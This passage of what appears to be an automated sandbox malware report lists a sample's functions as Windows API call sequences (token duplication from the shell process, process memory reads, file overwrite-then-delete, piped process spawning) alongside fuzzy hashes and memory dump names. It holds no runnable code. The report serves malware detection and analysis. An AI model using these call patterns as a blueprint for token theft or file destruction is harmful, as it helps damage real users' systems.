        • Part of subcall function 00CA9041: GetProcessHeap.KERNEL32(00000000,?,00CA62B1,00000030,?,00000040,00CA2A6F,00CAB410), ref: 00CA904D
        • Part of subcall function 00CA9041: RtlAllocateHeap.NTDLL(00000000), ref: 00CA9054
      • GetTokenInformation.ADVAPI32(?,00000002,00000000,00CA497D,00CA497D), ref: 00CA4492
      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00CA44B3
      • EqualSid.ADVAPI32(?,?), ref: 00CA44D1
      • LookupAccountSidW.ADVAPI32(00000000,?,?,00CA497D,?,00CA497D,?), ref: 00CA450C
      • GetLastError.KERNEL32 ref: 00CA4516
      • FreeSid.ADVAPI32(?), ref: 00CA4533
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: ProcessToken$AllocateHeapInformation$AccountCurrentEqualErrorFreeInitializeLastLookupOpen
      • String ID:
      • API String ID: 2524414099-0
      • Opcode ID: 5bff30b3fc09320b24bc536c01cfa277ba197e0ca8fd363aa0cc396ef38cd07f
      • Instruction ID: cd515d0dd09f90e5698bd23eca2e985fa2e1f045c2888ca1c971a12c342b4b85
      • Opcode Fuzzy Hash: 5bff30b3fc09320b24bc536c01cfa277ba197e0ca8fd363aa0cc396ef38cd07f
      • Instruction Fuzzy Hash: C531F772D0020AABDB11DF95DC85FEEBBB8EB49349F10406AE612E2050D7719F45DB61
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA5D61 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109fileCOMMON
      Download Yara Rule
      APIs
        • Part of subcall function 00CA9041: GetProcessHeap.KERNEL32(00000000,?,00CA62B1,00000030,?,00000040,00CA2A6F,00CAB410), ref: 00CA904D
        • Part of subcall function 00CA9041: RtlAllocateHeap.NTDLL(00000000), ref: 00CA9054
      • FindFirstFileW.KERNEL32(00000000,?,?,00000000,-00000002,00000002), ref: 00CA5DC6
      • FindNextFileW.KERNEL32(00000000,?,?,00000000,-00000002,00000002), ref: 00CA5E9C
      • FindClose.KERNEL32(00000000,?,00000000,-00000002,00000002), ref: 00CA5EAD
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Find$FileHeap$AllocateCloseFirstNextProcess
      • String ID: .$.
      • API String ID: 2373226758-3769392785
      • Opcode ID: 1ee7436286f8576cd0fa86423b2c613309c13d9dd87ed3be1480f31cbc75624b
      • Instruction ID: 9c79ee4d5c79afa00d399eeed477ce170369ce38e87e7561c80b72facd5a17f3
      • Opcode Fuzzy Hash: 1ee7436286f8576cd0fa86423b2c613309c13d9dd87ed3be1480f31cbc75624b
      • Instruction Fuzzy Hash: 0231AE3180191BBFCF21AFA0DC49AEE77B8EF0A359F14C055F815A2091E7398B95DB91
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA6A04 Relevance: .4, Instructions: 384COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 8b94f504fdab06e34e403aa4450fce84c0cf91101fad2b02466bb7261eee9c45
      • Instruction ID: def9daa5dfe5f5afcdb967a6e8663cfb0c5864bdf884963b3f993fae4dde2393
      • Opcode Fuzzy Hash: 8b94f504fdab06e34e403aa4450fce84c0cf91101fad2b02466bb7261eee9c45
      • Instruction Fuzzy Hash: 0FF13E32E146958BE740CFAEDCC064EBFF3ABCA20575DC698C6545B226D2347612CBA0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA6F2A Relevance: .4, Instructions: 382COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: da95485fe3b64b76f49177537fd5e055d9993c1266079195f23cc4cb01979111
      • Instruction ID: df046d7947c842bf1e711ec808df7564950cc9ae67a78ca827f6b50c661d3632
      • Opcode Fuzzy Hash: da95485fe3b64b76f49177537fd5e055d9993c1266079195f23cc4cb01979111
      • Instruction Fuzzy Hash: FEF15F72E046958FD740CFAEDCC064EBBF3ABCA20576EC695C65457217D234BA02CBA0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA669B Relevance: .2, Instructions: 184COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 4df41a87a92ceda7eb97351c6a733ee9a2746bf713db32d6126d02ea9e5020da
      • Instruction ID: 0c940f1a94e9536219c463db5514e981089b389d2ddb65356782d4897033691f
      • Opcode Fuzzy Hash: 4df41a87a92ceda7eb97351c6a733ee9a2746bf713db32d6126d02ea9e5020da
      • Instruction Fuzzy Hash: 4A7182705181A04FD75CCF2AC4A4835FFE2AFCA21531E82EED5AA4F2A7C638D541DB60
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA646A Relevance: .2, Instructions: 174COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: edc0dc022514c83fb5b8efb38fef8e418e63fd14e791a67e9b1f1cb1108a2d94
      • Instruction ID: 54fc0eaf795ec56997edcc8d13928e498174807a0a08362acc130c1e551efd42
      • Opcode Fuzzy Hash: edc0dc022514c83fb5b8efb38fef8e418e63fd14e791a67e9b1f1cb1108a2d94
      • Instruction Fuzzy Hash: 715102B0B105158BD708CF79DC903AEBBE2EBCA30CF18C67CD506C7285D6399A158B80
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA82EE Relevance: .2, Instructions: 150COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: a7cd152b68ca8b499fe63e6e51ca2b7de7e4a858bc0c807291a8bf5b303d86fa
      • Instruction ID: 67cc9eb89454d62a6f802b7149a7c0219c9f2759c40559e5ad7ac7cffa1eedd5
      • Opcode Fuzzy Hash: a7cd152b68ca8b499fe63e6e51ca2b7de7e4a858bc0c807291a8bf5b303d86fa
      • Instruction Fuzzy Hash: 26511E75E002188FCB08CF89D4909ADFBB6FF88314B1A81AED91567362C774AD55CF94
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA848A Relevance: .1, Instructions: 128COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: df09c49491fbe803488226f648bab1146881dcf6a53421a2eaa884f6f0b7e83e
      • Instruction ID: 5093081e5e91ba563194e822ab526422c0db88c6a4c39b8d949fbd41fcd85724
      • Opcode Fuzzy Hash: df09c49491fbe803488226f648bab1146881dcf6a53421a2eaa884f6f0b7e83e
      • Instruction Fuzzy Hash: 21412D317007828FC714CBBCC8D08AEBFF5AFEA21474449ADE68797B42C530A949CB64
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA4B85 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 166pipeprocessfileCOMMON
      Download Yara Rule
      APIs
        • Part of subcall function 00CA3D4B: GetModuleHandleA.KERNEL32(00000000,?,00000000,00000000,00CA48E0,?), ref: 00CA3D8C
        • Part of subcall function 00CA3D4B: GetProcAddress.KERNEL32(00000000,00000001), ref: 00CA3DA1
      • CreatePipe.KERNEL32(?,?,?,00000000), ref: 00CA4C1D
      • CreatePipe.KERNEL32(?,?,?,00000000), ref: 00CA4C37
      • SetHandleInformation.KERNEL32(?,00000001,00000000), ref: 00CA4C4D
      • SetHandleInformation.KERNEL32(?,00000001,00000000), ref: 00CA4C5D
      • CreateProcessW.KERNEL32 ref: 00CA4CB3
      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00CA4CD4
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CA4CE0
      • CloseHandle.KERNEL32(?), ref: 00CA4D07
      • CloseHandle.KERNEL32(?), ref: 00CA4D13
      • CloseHandle.KERNEL32(?), ref: 00CA4D22
      • CloseHandle.KERNEL32(?), ref: 00CA4D2E
      • CloseHandle.KERNEL32(?), ref: 00CA4D3A
      • CloseHandle.KERNEL32(?), ref: 00CA4D46
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Handle$Close$Create$InformationPipe$AddressFileModuleObjectProcProcessSingleWaitWrite
      • String ID: D
      • API String ID: 4141597255-2746444292
      • Opcode ID: 9e5f9a8264c3c9646c2ebb13560cacc3315fa2239d755a0609144f9f25d87aa1
      • Instruction ID: 93003f0680ae0ae87061e70a9f6048efec44658a9975975b80dedbd6d2d605b2
      • Opcode Fuzzy Hash: 9e5f9a8264c3c9646c2ebb13560cacc3315fa2239d755a0609144f9f25d87aa1
      • Instruction Fuzzy Hash: 2D514972409356AFC711DF65DC44E9FBBE8EFC6764F00492EB5A882060DB71CA04DBA2
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA3EE1 Relevance: 24.2, APIs: 16, Instructions: 203libraryloaderCOMMON
      Download Yara Rule
      APIs
      • GetModuleHandleA.KERNEL32(00000000,00000001,74DF35B0,00000208,00000000), ref: 00CA3F86
      • GetProcAddress.KERNEL32(00000000), ref: 00CA3F8F
      • GetModuleHandleA.KERNEL32(00000000,?), ref: 00CA3F98
      • GetProcAddress.KERNEL32(00000000), ref: 00CA3F9B
      • GetModuleHandleA.KERNEL32(00000000,?), ref: 00CA3FA4
      • GetProcAddress.KERNEL32(00000000), ref: 00CA3FA7
      • GetModuleHandleA.KERNEL32(00000000,?), ref: 00CA3FB0
      • GetProcAddress.KERNEL32(00000000), ref: 00CA3FB3
      • GetCurrentProcessId.KERNEL32 ref: 00CA3FE6
      • OpenProcess.KERNEL32(00000438,00000000,00000000), ref: 00CA3FF3
      • ReadProcessMemory.KERNEL32(00000000,?,?,00000020,00000000), ref: 00CA402C
      • ReadProcessMemory.KERNEL32(000000FF,?,?,00000030,00000000), ref: 00CA4046
      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00CA407D
      • ReadProcessMemory.KERNEL32(000000FF,?,?,00000004,00000000), ref: 00CA409A
      • ReadProcessMemory.KERNEL32(000000FF,?,?,?,00000000), ref: 00CA40B6
      • CloseHandle.KERNEL32(000000FF), ref: 00CA4104
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Process$HandleModule$AddressMemoryProcRead$CloseCurrentFileNameOpen
      • String ID:
      • API String ID: 754965762-0
      • Opcode ID: 08e72ab662d560b05d27699ac524ea8bdf525527f1c7955ea3f55273145815da
      • Instruction ID: 8fbc0abcf3d061900fc8409cef1932a370672cbf59fd78415b8f198b0626751a
      • Opcode Fuzzy Hash: 08e72ab662d560b05d27699ac524ea8bdf525527f1c7955ea3f55273145815da
      • Instruction Fuzzy Hash: F27129B1D0020AEFDF119FA4CC48EEEBBB8EF89318F144056FA11A2151DB759A45DBA1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA8782 Relevance: 21.3, APIs: 14, Instructions: 287fileCOMMON
      Download Yara Rule
      APIs
      • GetFileAttributesW.KERNEL32(?), ref: 00CA87F3
      • GetFileAttributesW.KERNEL32(?), ref: 00CA8816
      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 00CA8835
      • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000002), ref: 00CA885C
      • SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 00CA888C
      • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000001,?,00000000), ref: 00CA88AD
      • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 00CA8938
      • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 00CA8966
      • WriteFile.KERNEL32(00000002,00000000,?,?,00000000), ref: 00CA8A62
      • FlushFileBuffers.KERNEL32(F0A75E12), ref: 00CA8A95
      • FlushFileBuffers.KERNEL32(00000002), ref: 00CA8A9A
        • Part of subcall function 00CA86B7: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000002), ref: 00CA86EA
        • Part of subcall function 00CA86B7: SetFilePointerEx.KERNEL32(?,?,?,?,00000000), ref: 00CA8713
        • Part of subcall function 00CA86B7: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00CA8737
        • Part of subcall function 00CA86B7: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00CA8766
      • CloseHandle.KERNEL32(?), ref: 00CA8AC2
      • CloseHandle.KERNEL32(000000FF), ref: 00CA8ACD
      • DeleteFileW.KERNEL32(?), ref: 00CA8AE3
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: File$PointerWrite$AttributesBuffersCloseCreateFlushHandle$DeleteRead
      • String ID:
      • API String ID: 668398616-0
      • Opcode ID: 68989bb577583d3137c054539d4c88ea82f529b763cc68f00b55cf162353a20b
      • Instruction ID: 80ff15ed7a016048e291828106d09a53a98a9a2ec70b1ac24953f110597df22a
      • Opcode Fuzzy Hash: 68989bb577583d3137c054539d4c88ea82f529b763cc68f00b55cf162353a20b
      • Instruction Fuzzy Hash: 18B17D71A0020AAFDF11CFA4CC45BEEBBB9FF09318F144525F915E6190EB35AA58DB60
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA49D3 Relevance: 19.7, APIs: 13, Instructions: 160libraryloaderthreadCOMMON
      Download Yara Rule
      APIs
        • Part of subcall function 00CA9041: GetProcessHeap.KERNEL32(00000000,?,00CA62B1,00000030,?,00000040,00CA2A6F,00CAB410), ref: 00CA904D
        • Part of subcall function 00CA9041: RtlAllocateHeap.NTDLL(00000000), ref: 00CA9054
      • GetVersion.KERNEL32(00000000,?,00000000), ref: 00CA4A12
      • GetModuleHandleA.KERNEL32(?,00000001), ref: 00CA4A71
      • GetProcAddress.KERNEL32(00000000), ref: 00CA4A78
      • CloseHandle.KERNEL32(?), ref: 00CA4B38
        • Part of subcall function 00CA5B0E: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00CA5B3B,00000000,00000000,00000000,00CA37EB,00000000), ref: 00CA5B19
      • GetShellWindow.USER32 ref: 00CA4AA3
      • GetWindowThreadProcessId.USER32(00000000,?), ref: 00CA4AB2
      • OpenProcess.KERNEL32(00000400,00000000,?), ref: 00CA4AC5
      • OpenProcessToken.ADVAPI32(00000000,02000000,00CA2B94), ref: 00CA4ADD
      • DuplicateTokenEx.ADVAPI32(00CA2B94,02000000,?,00000002,00000001,?), ref: 00CA4AFE
      • CloseHandle.KERNEL32(?), ref: 00CA4B42
      • CloseHandle.KERNEL32(?), ref: 00CA4B4C
      • CloseHandle.KERNEL32(00CA2B94), ref: 00CA4B56
      • CloseHandle.KERNEL32(?), ref: 00CA4B60
        • Part of subcall function 00CA3D4B: GetModuleHandleA.KERNEL32(00000000,?,00000000,00000000,00CA48E0,?), ref: 00CA3D8C
        • Part of subcall function 00CA3D4B: GetProcAddress.KERNEL32(00000000,00000001), ref: 00CA3DA1
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Handle$Close$Process$Module$AddressHeapOpenProcTokenWindow$AllocateDuplicateFileNameShellThreadVersion
      • String ID:
      • API String ID: 2214859210-0
      • Opcode ID: eeffeaaefd461300841047200f380e536719c52a0a14779eaf31e8b80c8e54c4
      • Instruction ID: cb2bd45029608e8d58df226bbfe275a6e9eb697e44359b5e4b5f61f0328719fb
      • Opcode Fuzzy Hash: eeffeaaefd461300841047200f380e536719c52a0a14779eaf31e8b80c8e54c4
      • Instruction Fuzzy Hash: 90516771C0121AFFDF119FA0EC45BEEBBB9EF4A709F200066F114A2060D7709A45DBA1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA454B Relevance: 16.8, APIs: 11, Instructions: 256filelibraryloaderCOMMON
      Download Yara Rule
      APIs
        • Part of subcall function 00CA3C7A: GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00CA28D8,00000000,00000000), ref: 00CA3CA2
        • Part of subcall function 00CA3A18: RegOpenKeyExW.KERNELBASE(00000002,00000000,00000000,00020119,00000000,00000000,00000000,80000002,00000000,00000002,?), ref: 00CA3A44
        • Part of subcall function 00CA3A18: RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,?,?), ref: 00CA3A60
        • Part of subcall function 00CA3A18: RegCloseKey.KERNELBASE(?), ref: 00CA3A79
      • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,80000002,00000000,00000002,?), ref: 00CA463C
      • GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,80000002,00000000,00000002,?), ref: 00CA464E
      • GetProcAddress.KERNEL32(00000000), ref: 00CA4655
      • GetCurrentProcess.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,?,?,?,?,80000002,00000000), ref: 00CA46E1
      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,?,?,?,?,00000000), ref: 00CA4737
      • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,00000000), ref: 00CA475F
      • WriteFile.KERNEL32(?,?,00000208,?,00000000,?,?,?,?,00000000), ref: 00CA478B
      • FlushFileBuffers.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,?,?,?,?,80000002,00000000), ref: 00CA47A3
      • CloseHandle.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,?,?,?,?,80000002,00000000), ref: 00CA47AD
        • Part of subcall function 00CA3EE1: GetModuleHandleA.KERNEL32(00000000,00000001,74DF35B0,00000208,00000000), ref: 00CA3F86
        • Part of subcall function 00CA3EE1: GetProcAddress.KERNEL32(00000000), ref: 00CA3F8F
        • Part of subcall function 00CA3EE1: GetModuleHandleA.KERNEL32(00000000,?), ref: 00CA3F98
        • Part of subcall function 00CA3EE1: GetProcAddress.KERNEL32(00000000), ref: 00CA3F9B
        • Part of subcall function 00CA3EE1: GetModuleHandleA.KERNEL32(00000000,?), ref: 00CA3FA4
        • Part of subcall function 00CA3EE1: GetProcAddress.KERNEL32(00000000), ref: 00CA3FA7
        • Part of subcall function 00CA3EE1: GetModuleHandleA.KERNEL32(00000000,?), ref: 00CA3FB0
        • Part of subcall function 00CA3EE1: GetProcAddress.KERNEL32(00000000), ref: 00CA3FB3
        • Part of subcall function 00CA3EE1: GetCurrentProcessId.KERNEL32 ref: 00CA3FE6
        • Part of subcall function 00CA3EE1: OpenProcess.KERNEL32(00000438,00000000,00000000), ref: 00CA3FF3
        • Part of subcall function 00CA4325: CoInitializeEx.OLE32(00000000,00000006,?,74DF35B0,00000208,00000000,00CA47D7,?,00000000,?), ref: 00CA437F
        • Part of subcall function 00CA4325: CoUninitialize.OLE32(?,?,?,?,?,?,74DF35B0,00000208,00000000,00CA47D7), ref: 00CA43B5
        • Part of subcall function 00CA3E9E: ShellExecuteExW.SHELL32(?), ref: 00CA3ED9
      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,00000000), ref: 00CA47FA
      • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CA4824
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Handle$AddressFileModuleProc$Process$CloseCurrentOpenWrite$BuffersCreateDeleteExecuteFlushInformationInitializeObjectQueryShellSingleUninitializeValueVersionVolumeWait
      • String ID:
      • API String ID: 3832649910-0
      • Opcode ID: 94dff0a0857a856fa74dfebb20404b6aa02954154d268a23c74a5ab12867c9b2
      • Instruction ID: 2218f3034b7845449935eb57321a16150534e1435080d89b21c87e728cc0f4ba
      • Opcode Fuzzy Hash: 94dff0a0857a856fa74dfebb20404b6aa02954154d268a23c74a5ab12867c9b2
      • Instruction Fuzzy Hash: FA91A672408342AFDB11AF60DC46E5FBBE8EF86319F04092DF595D21A1E7B5CA049B53
      Uniqueness

      Uniqueness Score: -1.00%

